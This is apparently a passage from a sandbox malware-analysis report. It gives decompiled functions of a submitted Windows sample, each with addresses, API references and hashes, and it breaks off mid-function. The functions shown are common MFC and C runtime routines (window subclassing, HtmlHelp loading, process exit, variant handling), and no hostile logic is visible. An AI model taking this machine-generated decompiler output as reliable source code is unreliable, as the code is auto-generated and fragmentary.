				_t34 = GetWindowLongA( *(_t72 + 0x1c), 0xfffffffc);
				E00426363(_t72);
				if(GetWindowLongA( *(_t72 + 0x1c), 0xfffffffc) == _t34) {
					_t43 =  *( *((intOrPtr*)( *_t72 + 0xf0))());
					if(_t43 != 0) {
						SetWindowLongA( *(_t72 + 0x1c), 0xfffffffc, _t43);
					}
				}
				E00426480(_t72);
				return  *((intOrPtr*)( *_t72 + 0x114))();
			}















                                                                              0x00426554
                                                                              0x0042655b
                                                                              0x00426561
                                                                              0x00426566
                                                                              0x0042658b
                                                                              0x0042658b
                                                                              0x00426591
                                                                              0x00426593
                                                                              0x00426593
                                                                              0x00426591
                                                                              0x00426596
                                                                              0x0042659b
                                                                              0x0042659f
                                                                              0x004265a2
                                                                              0x004265a2
                                                                              0x004265a5
                                                                              0x004265ad
                                                                              0x004265b2
                                                                              0x004265b2
                                                                              0x004265b5
                                                                              0x004265bc
                                                                              0x004265c3
                                                                              0x004265c8
                                                                              0x004265d8
                                                                              0x004265dd
                                                                              0x004265e3
                                                                              0x004265e6
                                                                              0x004265f7
                                                                              0x004265fe
                                                                              0x00426601
                                                                              0x00426601
                                                                              0x004265c8
                                                                              0x00426613
                                                                              0x00426619
                                                                              0x00426628
                                                                              0x00426634
                                                                              0x00426638
                                                                              0x00426640
                                                                              0x00426640
                                                                              0x00426638
                                                                              0x00426648
                                                                              0x0042665b

                                                                              APIs
                                                                              • SendMessageA.USER32(00000000,00000405,00000000,?), ref: 00426601
                                                                              • GetWindowLongA.USER32 ref: 00426613
                                                                              • GetWindowLongA.USER32 ref: 00426624
                                                                              • SetWindowLongA.USER32 ref: 00426640
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: LongWindow$MessageSend
                                                                              • String ID: (
                                                                              • API String ID: 2178440468-3887548279
                                                                              • Opcode ID: 9c4bcfc4ee51cfbf3176cafee28f459e07d27a4d4cb54d451c298dc73f6ee003
                                                                              • Instruction ID: a63dd4c9a30836d874787e4657041ba80e4b8e3c142ff3cba496c3d6a54188c0
                                                                              • Opcode Fuzzy Hash: 9c4bcfc4ee51cfbf3176cafee28f459e07d27a4d4cb54d451c298dc73f6ee003
                                                                              • Instruction Fuzzy Hash: EC31B670700720AFDB20AFA5E984A6EB7F4BF04314F550A2EE541D7791DB79E8448B98
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004245ED, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E004245ED(void* __ecx, void* __eflags, struct HWND__** _a4) {
				void* _t12;
				struct HWND__* _t14;
				struct HWND__* _t17;
				struct HWND__** _t24;
				void* _t25;

				_t24 = _a4;
				_t25 = __ecx;
				if(E00424FF1(__ecx, _t24) != 0) {
					L12:
					return 1;
				}
				_t12 = E00426C61(__ecx);
				if(_t12 == 0 ||  *((intOrPtr*)(_t12 + 0x64)) == 0) {
					if(_t24[1] != 0x100) {
						L13:
						return E00425910(_t24);
					}
					_t14 = _t24[2];
					if(_t14 == 0x1b || _t14 == 3) {
						if((GetWindowLongA( *_t24, 0xfffffff0) & 0x00000004) == 0 || E0042AB7A( *_t24, ?str?) == 0) {
							goto L13;
						} else {
							_t17 = GetDlgItem( *(_t25 + 0x1c), 2);
							if(_t17 == 0 || IsWindowEnabled(_t17) != 0) {
								SendMessageA( *(_t25 + 0x1c), 0x111, 2, 0);
								goto L12;
							} else {
								goto L13;
							}
						}
					} else {
						goto L13;
					}
				} else {
					return 0;
				}
			}








                                                                              0x004245ef
                                                                              0x004245f4
                                                                              0x004245fd
                                                                              0x00424674
                                                                              0x00000000
                                                                              0x00424676
                                                                              0x00424601
                                                                              0x00424608
                                                                              0x0042461b
                                                                              0x00424679
                                                                              0x00000000
                                                                              0x0042467c
                                                                              0x0042461d
                                                                              0x00424623
                                                                              0x00424636
                                                                              0x00000000
                                                                              0x00424648
                                                                              0x0042464d
                                                                              0x00424655
                                                                              0x0042466e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00424655
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00424610
                                                                              0x00000000
                                                                              0x00424610

                                                                              APIs
                                                                              • GetWindowLongA.USER32 ref: 0042462E
                                                                              • GetDlgItem.USER32 ref: 0042464D
                                                                              • IsWindowEnabled.USER32(00000000), ref: 00424658
                                                                              • SendMessageA.USER32(?,00000111,00000002,00000000), ref: 0042466E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Window$EnabledItemLongMessageSend
                                                                              • String ID: Edit
                                                                              • API String ID: 3499652902-554135844
                                                                              • Opcode ID: 5e20d823228ff4028015ccd002ff231b5a2e6e116b7465e0d62b9a8d207303ff
                                                                              • Instruction ID: a2700694f9d9f0967da1c6dfa14d6a282cfffe46059050308ef3b8d2e634c46b
                                                                              • Opcode Fuzzy Hash: 5e20d823228ff4028015ccd002ff231b5a2e6e116b7465e0d62b9a8d207303ff
                                                                              • Instruction Fuzzy Hash: 0C01C430300221BBFB212A36BD09B5BB6A8EFD6754F90442BB401E26A0CBACDC55C56C
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00426F0A, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 93%
                                                                              			E00426F0A(void* __ebp, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v0;
				intOrPtr _v4;
				struct HINSTANCE__* _t16;
				_Unknown_base(*)()* _t18;
				void* _t21;

				E0042E21A(0xc);
				_push(E0042D814);
				_t21 = E0042DCF8(0x459f84);
				if( *(_t21 + 8) != 0) {
					L5:
					E0042E27D(0xc);
					return  *(_t21 + 8)(_v4, _v0, _a4, _a8);
				}
				_t16 = LoadLibraryA("hhctrl.ocx");
				 *(_t21 + 4) = _t16;
				if(_t16 == 0) {
					L4:
					return 0;
				}
				_t18 = GetProcAddress(_t16, "HtmlHelpA");
				 *(_t21 + 8) = _t18;
				if(_t18 != 0) {
					goto L5;
				}
				FreeLibrary( *(_t21 + 4));
				 *(_t21 + 4) =  *(_t21 + 4) & 0x00000000;
				goto L4;
			}








                                                                              0x00426f0d
                                                                              0x00426f12
                                                                              0x00426f21
                                                                              0x00426f27
                                                                              0x00426f5f
                                                                              0x00426f61
                                                                              0x00000000
                                                                              0x00426f76
                                                                              0x00426f2e
                                                                              0x00426f36
                                                                              0x00426f39
                                                                              0x00426f5b
                                                                              0x00000000
                                                                              0x00426f5b
                                                                              0x00426f41
                                                                              0x00426f49
                                                                              0x00426f4c
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00426f51
                                                                              0x00426f57
                                                                              0x00000000

                                                                              APIs
                                                                                • Part of subcall function 0042E21A: EnterCriticalSection.KERNEL32(0045A154,?,00000000,?,?,0042DD19,00000010,74B04DE0,00000000,?,?,?,0042D19E,0042D151,0042CC8D,0042D1A4), ref: 0042E248
                                                                                • Part of subcall function 0042E21A: InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,0042DD19,00000010,74B04DE0,00000000,?,?,?,0042D19E,0042D151,0042CC8D,0042D1A4), ref: 0042E25A
                                                                                • Part of subcall function 0042E21A: LeaveCriticalSection.KERNEL32(0045A154,?,00000000,?,?,0042DD19,00000010,74B04DE0,00000000,?,?,?,0042D19E,0042D151,0042CC8D,0042D1A4), ref: 0042E263
                                                                                • Part of subcall function 0042E21A: EnterCriticalSection.KERNEL32(00000000,00000000,?,?,0042DD19,00000010,74B04DE0,00000000,?,?,?,0042D19E,0042D151,0042CC8D,0042D1A4,004239CA), ref: 0042E275
                                                                                • Part of subcall function 0042DCF8: __EH_prolog.LIBCMT ref: 0042DCFD
                                                                              • LoadLibraryA.KERNEL32(hhctrl.ocx,0042D814,0000000C), ref: 00426F2E
                                                                              • GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 00426F41
                                                                              • FreeLibrary.KERNEL32(?), ref: 00426F51
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$EnterLibrary$AddressFreeH_prologInitializeLeaveLoadProc
                                                                              • String ID: HtmlHelpA$hhctrl.ocx
                                                                              • API String ID: 813623328-63838506
                                                                              • Opcode ID: 7751eb0f48a971483a9b2d3d49afb441e249794db7093acebf144680adc25de2
                                                                              • Instruction ID: ec84fb330353fb2223ea04a242bd68e69340dc90ea18e4341332e045746a19a5
                                                                              • Opcode Fuzzy Hash: 7751eb0f48a971483a9b2d3d49afb441e249794db7093acebf144680adc25de2
                                                                              • Instruction Fuzzy Hash: 2EF0A430304311EFDB106F71FE09B077BE1AF44B41F51885EB14A911A1C7B88854DB2A
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00412FFD, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 13libraryloaderCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 68%
                                                                              			E00412FFD(int _a4) {
				struct HINSTANCE__* _t3;
				_Unknown_base(*)()* _t4;

				_t3 = GetModuleHandleA("mscoree.dll");
				if(_t3 != 0) {
					_t4 = GetProcAddress(_t3, "CorExitProcess");
					if(_t4 != 0) {
						 *_t4(_a4);
					}
				}
				ExitProcess(_a4);
			}





                                                                              0x00413002
                                                                              0x0041300a
                                                                              0x00413012
                                                                              0x0041301a
                                                                              0x00413020
                                                                              0x00413020
                                                                              0x0041301a
                                                                              0x00413026

                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(mscoree.dll,0041316B,?,0044BCA0,00000008,004131A2,?,00000001,00000000,004186CD,00000003), ref: 00413002
                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00413012
                                                                              • ExitProcess.KERNEL32 ref: 00413026
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: AddressExitHandleModuleProcProcess
                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                              • API String ID: 75539706-1276376045
                                                                              • Opcode ID: e0e97cc8cc4b6864abc04eab186df5826a1657425e816fd553d1da5beef36913
                                                                              • Instruction ID: bf4fb5760515a6d20d965b8590582e7a2281e39d95d480b19d3eb211be91e2db
                                                                              • Opcode Fuzzy Hash: e0e97cc8cc4b6864abc04eab186df5826a1657425e816fd553d1da5beef36913
                                                                              • Instruction Fuzzy Hash: 98D0C930204201ABFA201FB19F89A1B3BBCEE48B027149429B545D01B0CFB8CD40EA2A
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0042F640, Relevance: 7.7, APIs: 5, Instructions: 236stringCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 58%
                                                                              			E0042F640(intOrPtr __ecx, intOrPtr __edx) {
				signed int __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t94;
				int _t95;
				void* _t100;
				signed short* _t101;
				void* _t108;
				signed short* _t114;
				signed short* _t116;
				signed short* _t117;
				signed short* _t120;
				signed short _t123;
				signed int _t125;
				signed int _t128;
				void* _t134;
				char _t140;
				CHAR* _t144;
				signed short* _t147;
				void* _t149;
				void* _t151;
				intOrPtr _t153;
				CHAR* _t154;
				signed short* _t156;
				void* _t157;
				int _t160;
				char* _t165;
				void* _t166;
				void* _t168;
				CHAR* _t169;
				char* _t172;
				signed int _t177;
				CHAR* _t180;

				_t153 = __edx;
				_t148 = __ecx;
				E004128A0(E00431422, _t166);
				_t169 = _t168 - 0x2c;
				_t144 =  *(_t166 + 8);
				_t94 = _t144[8];
				_push(_t154);
				 *(_t166 - 0x10) = _t169;
				 *((intOrPtr*)(_t166 - 0x20)) = __ecx;
				 *(_t166 - 0x11) = 0;
				 *(_t166 + 8) = _t94;
				if(_t94 == 0) {
					 *(_t166 + 8) = _t166 - 0x11;
				}
				_t95 = lstrlenA( *(_t166 + 8));
				_t174 =  *(_t166 + 0xc) & 0x0000000c;
				_t160 = _t95;
				 *(_t166 - 0x18) = _t144[0x10];
				 *(_t166 - 0x1c) = _t144[0xc];
				if(( *(_t166 + 0xc) & 0x0000000c) == 0) {
					L7:
					_t145 =  *(_t166 + 0x14);
					_push(( *(_t166 + 0x14))[8] << 4);
					_t100 = E004080BD(_t145, _t148, _t154, _t160, _t177);
					_t178 = _t100;
					_pop(_t149);
					if(_t100 == 0) {
						L9:
						_t101 = 0x8007000e;
						L47:
						 *[fs:0x0] =  *((intOrPtr*)(_t166 - 0xc));
						return _t101;
					}
					E00412260((_t145[8] << 0x00000004) + 0x00000003 & 0xfffffffc, _t149);
					 *(_t166 - 0x10) = _t169;
					 *(_t166 + 0xc) = _t169;
					E00412140( *(_t166 + 0xc), 0, _t145[8] << 4);
					_t172 =  &(_t169[0xc]);
					_t156 = E0042F3A5( *(_t166 + 8),  *(_t166 - 0x1c));
					_t38 =  &(_t156[8]); // 0x10
					_t164 = _t38;
					_t108 = E004080BD(_t145, _t149, _t156, _t38, _t178);
					_t151 = _t38;
					if(_t108 != 0) {
						E00412260( &(_t164[1]) & 0xfffffffc, _t151);
						 *(_t166 - 0x10) = _t172;
						_t165 = _t172;
						_t114 = E0042F3E7( *((intOrPtr*)(_t166 - 0x20)), _t165,  *(_t166 + 8), _t166 - 0x34,  *(_t166 - 0x1c), _t145,  *(_t166 + 0x18),  *(_t166 + 0xc));
						_t147 = 0;
						__eflags = _t114;
						 *(_t166 + 0x18) = _t114;
						if(_t114 != 0) {
							L17:
							_t165 =  *(_t166 + 0x14);
							 *(_t166 - 4) =  *(_t166 - 4) | 0xffffffff;
							_t157 = 0;
							__eflags = _t165[8];
							if(_t165[8] <= 0) {
								L20:
								_t101 =  *(_t166 + 0x18);
								__eflags = _t101;
								if(_t101 != 0) {
									goto L47;
								}
								_t156 =  *(_t166 + 0x10);
								__eflags = _t156;
								if(_t156 == 0) {
									_t116 = ( *(_t166 - 0x1c) & 0x0000ffff) - 8;
									__eflags = _t116;
									if(_t116 == 0) {
										__eflags = _t147;
										if(_t147 != 0) {
											__imp__#6(_t147);
										}
										L46:
										_t101 = 0;
										__eflags = 0;
										goto L47;
									}
									_t117 = _t116 - 1;
									__eflags = _t117;
									if(_t117 == 0) {
										L41:
										__eflags = _t147;
										if(_t147 != 0) {
											 *((intOrPtr*)( *_t147 + 8))(_t147);
										}
										goto L46;
									}
									_t120 = _t117 - 3;
									__eflags = _t120;
									if(_t120 == 0) {
										__imp__#9(_t166 - 0x34);
										goto L46;
									}
									__eflags = _t120 != 1;
									if(_t120 != 1) {
										goto L46;
									}
									goto L41;
								}
								_t123 =  *(_t166 - 0x1c);
								 *_t156 = _t123;
								_t125 = (_t123 & 0x0000ffff) + 0xfffffffe;
								__eflags = _t125 - 0x13;
								if(_t125 > 0x13) {
									goto L46;
								}
								switch( *((intOrPtr*)(_t125 * 4 +  &M0042F906))) {
									case 0:
										L35:
										 *(__edi + 8) = __bx;
										goto L46;
									case 1:
										 *(__edi + 8) = __ebx;
										goto L46;
									case 2:
										__eax =  *(__ebp - 0x34);
										 *(__edi + 8) =  *(__ebp - 0x34);
										goto L46;
									case 3:
										 *(__edi + 8) =  *(__ebp - 0x34);
										goto L46;
									case 4:
										__eax =  *(__ebp - 0x34);
										 *(__edi + 8) =  *(__ebp - 0x34);
										__eax =  *(__ebp - 0x30);
										 *(__edi + 0xc) =  *(__ebp - 0x30);
										goto L46;
									case 5:
										__ebx =  ~__ebx;
										asm("sbb ebx, ebx");
										goto L35;
									case 6:
										__esi = __ebp - 0x34;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										goto L46;
									case 7:
										goto L46;
									case 8:
										 *(__edi + 8) = __bl;
										goto L46;
								}
							}
							do {
								__imp__#9( *(_t166 + 0xc));
								 *(_t166 + 0xc) =  &(( *(_t166 + 0xc))[0x10]);
								_t157 = _t157 + 1;
								__eflags = _t157 - _t165[8];
							} while (_t157 < _t165[8]);
							goto L20;
						}
						_t128 =  *(_t166 - 0x1c) & 0x0000ffff;
						__eflags = _t128 - 4;
						 *(_t166 - 4) = 0;
						if(_t128 == 4) {
							_push(_t156);
							_push(_t165);
							_push( *(_t166 - 0x18));
							E00430217();
							 *(_t166 + 8) = _t180;
							 *(_t166 - 0x34) =  *(_t166 + 8);
							goto L17;
						}
						__eflags = _t128 - 5;
						if(_t128 == 5) {
							_push(_t156);
							_push(_t165);
							_push( *(_t166 - 0x18));
							E00430217();
							asm("fst qword [ebp-0x24]");
							L27:
							 *(_t166 - 0x34) = _t180;
							goto L17;
						}
						__eflags = _t128 - 7;
						if(_t128 == 7) {
							_push(_t156);
							_push(_t165);
							_push( *(_t166 - 0x18));
							E00430217();
							asm("fst qword [ebp-0x24]");
							goto L27;
						}
						__eflags = _t128 - 0x13;
						if(_t128 <= 0x13) {
							L24:
							_push(_t156);
							_push(_t165);
							_push( *(_t166 - 0x18));
							_t147 = E00430217();
							goto L17;
						}
						__eflags = _t128 - 0x15;
						if(_t128 > 0x15) {
							goto L24;
						}
						_push(_t156);
						_push(_t165);
						_push( *(_t166 - 0x18));
						 *(_t166 - 0x34) = E00430217();
						 *((intOrPtr*)(_t166 - 0x30)) = _t153;
						goto L17;
					}
					goto L9;
				}
				_t17 = _t160 + 3; // 0x3
				_t158 = _t17;
				_t134 = E004080BD(_t144, _t148, _t17, _t160, _t174);
				_t148 = _t17;
				if(_t134 == 0) {
					goto L9;
				}
				E00412260(_t158 + 0x00000003 & 0xfffffffc, _t148);
				 *(_t166 - 0x10) = _t169;
				_t154 = _t169;
				E00411AC0(_t154,  *(_t166 + 8), _t160);
				_t140 = _t144[0xc];
				_t169 =  &(_t169[0xc]);
				 *(_t166 + 8) = _t154;
				if(_t140 == 8) {
					_t140 = 0xe;
				}
				_t154[_t160] = 0xff;
				_t160 = _t160 + 1;
				_t23 = _t166 - 0x1c;
				 *_t23 =  *(_t166 - 0x1c) & 0x00000000;
				_t177 =  *_t23;
				_t154[_t160] = _t140;
				_t154[_t160 + 1] = 0;
				 *(_t166 - 0x18) = _t144[0x14];
				goto L7;
			}




































                                                                              0x0042f640
                                                                              0x0042f640
                                                                              0x0042f645
                                                                              0x0042f64a
                                                                              0x0042f64e
                                                                              0x0042f651
                                                                              0x0042f657
                                                                              0x0042f658
                                                                              0x0042f65b
                                                                              0x0042f65e
                                                                              0x0042f662
                                                                              0x0042f665
                                                                              0x0042f66a
                                                                              0x0042f66a
                                                                              0x0042f670
                                                                              0x0042f676
                                                                              0x0042f67a
                                                                              0x0042f67f
                                                                              0x0042f686
                                                                              0x0042f68a
                                                                              0x0042f6e4
                                                                              0x0042f6e4
                                                                              0x0042f6ed
                                                                              0x0042f6ee
                                                                              0x0042f6f3
                                                                              0x0042f6f5
                                                                              0x0042f6f6
                                                                              0x0042f73a
                                                                              0x0042f73a
                                                                              0x0042f8f2
                                                                              0x0042f8f8
                                                                              0x0042f903
                                                                              0x0042f903
                                                                              0x0042f706
                                                                              0x0042f70b
                                                                              0x0042f70e
                                                                              0x0042f717
                                                                              0x0042f71c
                                                                              0x0042f72a
                                                                              0x0042f72c
                                                                              0x0042f72c
                                                                              0x0042f730
                                                                              0x0042f737
                                                                              0x0042f738
                                                                              0x0042f74c
                                                                              0x0042f754
                                                                              0x0042f757
                                                                              0x0042f76b
                                                                              0x0042f770
                                                                              0x0042f772
                                                                              0x0042f774
                                                                              0x0042f777
                                                                              0x0042f7b5
                                                                              0x0042f7b5
                                                                              0x0042f7b8
                                                                              0x0042f7bc
                                                                              0x0042f7be
                                                                              0x0042f7c1
                                                                              0x0042f7dc
                                                                              0x0042f7dc
                                                                              0x0042f7df
                                                                              0x0042f7e1
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042f7e7
                                                                              0x0042f7ea
                                                                              0x0042f7ec
                                                                              0x0042f8bd
                                                                              0x0042f8bd
                                                                              0x0042f8c0
                                                                              0x0042f8e5
                                                                              0x0042f8e7
                                                                              0x0042f8ea
                                                                              0x0042f8ea
                                                                              0x0042f8f0
                                                                              0x0042f8f0
                                                                              0x0042f8f0
                                                                              0x00000000
                                                                              0x0042f8f0
                                                                              0x0042f8c2
                                                                              0x0042f8c2
                                                                              0x0042f8c3
                                                                              0x0042f8cd
                                                                              0x0042f8cd
                                                                              0x0042f8cf
                                                                              0x0042f8d4
                                                                              0x0042f8d4
                                                                              0x00000000
                                                                              0x0042f8cf
                                                                              0x0042f8c5
                                                                              0x0042f8c5
                                                                              0x0042f8c8
                                                                              0x0042f8dd
                                                                              0x00000000
                                                                              0x0042f8dd
                                                                              0x0042f8ca
                                                                              0x0042f8cb
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042f8cb
                                                                              0x0042f7f2
                                                                              0x0042f7f5
                                                                              0x0042f7fb
                                                                              0x0042f7fe
                                                                              0x0042f801
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042f807
                                                                              0x00000000
                                                                              0x0042f8aa
                                                                              0x0042f8aa
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042f883
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042f896
                                                                              0x0042f899
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042f8a1
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042f888
                                                                              0x0042f88b
                                                                              0x0042f88e
                                                                              0x0042f891
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042f8a6
                                                                              0x0042f8a8
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042f8b0
                                                                              0x0042f8b3
                                                                              0x0042f8b4
                                                                              0x0042f8b5
                                                                              0x0042f8b6
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042f87e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042f807
                                                                              0x0042f7c9
                                                                              0x0042f7cc
                                                                              0x0042f7d2
                                                                              0x0042f7d6
                                                                              0x0042f7d7
                                                                              0x0042f7d7
                                                                              0x00000000
                                                                              0x0042f7c9
                                                                              0x0042f779
                                                                              0x0042f77d
                                                                              0x0042f780
                                                                              0x0042f783
                                                                              0x0042f840
                                                                              0x0042f841
                                                                              0x0042f842
                                                                              0x0042f845
                                                                              0x0042f84a
                                                                              0x0042f850
                                                                              0x00000000
                                                                              0x0042f850
                                                                              0x0042f789
                                                                              0x0042f78c
                                                                              0x0042f82b
                                                                              0x0042f82c
                                                                              0x0042f82d
                                                                              0x0042f830
                                                                              0x0042f835
                                                                              0x0042f838
                                                                              0x0042f838
                                                                              0x00000000
                                                                              0x0042f838
                                                                              0x0042f792
                                                                              0x0042f795
                                                                              0x0042f81c
                                                                              0x0042f81d
                                                                              0x0042f81e
                                                                              0x0042f821
                                                                              0x0042f826
                                                                              0x00000000
                                                                              0x0042f826
                                                                              0x0042f79b
                                                                              0x0042f79e
                                                                              0x0042f80e
                                                                              0x0042f80e
                                                                              0x0042f80f
                                                                              0x0042f810
                                                                              0x0042f818
                                                                              0x00000000
                                                                              0x0042f818
                                                                              0x0042f7a0
                                                                              0x0042f7a3
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042f7a5
                                                                              0x0042f7a6
                                                                              0x0042f7a7
                                                                              0x0042f7af
                                                                              0x0042f7b2
                                                                              0x00000000
                                                                              0x0042f7b2
                                                                              0x00000000
                                                                              0x0042f738
                                                                              0x0042f68c
                                                                              0x0042f68c
                                                                              0x0042f690
                                                                              0x0042f697
                                                                              0x0042f698
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042f6a6
                                                                              0x0042f6ab
                                                                              0x0042f6ae
                                                                              0x0042f6b5
                                                                              0x0042f6ba
                                                                              0x0042f6be
                                                                              0x0042f6c5
                                                                              0x0042f6c8
                                                                              0x0042f6cc
                                                                              0x0042f6cc
                                                                              0x0042f6cd
                                                                              0x0042f6d1
                                                                              0x0042f6d2
                                                                              0x0042f6d2
                                                                              0x0042f6d2
                                                                              0x0042f6d6
                                                                              0x0042f6d9
                                                                              0x0042f6e1
                                                                              0x00000000

                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 0042F645
                                                                              • lstrlenA.KERNEL32(?,?,00000000), ref: 0042F670
                                                                              • VariantClear.OLEAUT32(0000000C), ref: 0042F7CC
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.232065962.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.232033886.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232256010.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232336850.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232366609.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000002.00000002.232381898.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: ClearH_prologVariantlstrlen
                                                                              • String ID:
                                                                              • API String ID: 2416264355-0
                                                                              • Opcode ID: 59f262e93eb3d54c44b9b0ab4d4c3d0cb35394539a6f33b0ea7e153b6283f029
                                                                              • Instruction ID: 2f4d000993e90adcd9ce416889be71dcdf4490a590de9620ba8869da2dc1db70
                                                                              • Opcode Fuzzy Hash: 59f262e93eb3d54c44b9b0ab4d4c3d0cb35394539a6f33b0ea7e153b6283f029
                                                                              • Instruction Fuzzy Hash: DD81A431A00229EFCF10DFA9D8819AFBBB0FF45314FA0813AF81597251D7389955DB99
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00416F68, Relevance: 7.7, APIs: 5, Instructions: 184COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E00416F68(signed int _a4) {
				intOrPtr _v8;
				struct _MEMORY_BASIC_INFORMATION _v36;
				signed int _t51;
				void* _t52;
				signed int _t53;
				signed int _t55;
				signed int _t56;
				signed int _t57;
				signed int* _t60;
				intOrPtr* _t61;
				intOrPtr _t63;
				signed int _t64;
				signed int* _t66;
				signed int _t67;
				intOrPtr _t68;
				void* _t69;
				signed int _t70;
				void* _t71;
				intOrPtr _t73;
				void _t74;
				signed int _t75;
				signed int _t76;
				short* _t77;
				void* _t79;
				signed int _t80;
				signed int _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr _t88;
				signed int _t91;
				signed int _t92;
				signed int _t93;

				_t92 = _a4;
				_t69 =  *(_t92 + 8);
				if((_t69 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x18];
				_t51 = _a4;
				_t73 =  *((intOrPtr*)(_t51 + 8));
				_v8 = _t73;
				if(_t69 < _t73 || _t69 >=  *((intOrPtr*)(_t51 + 4))) {
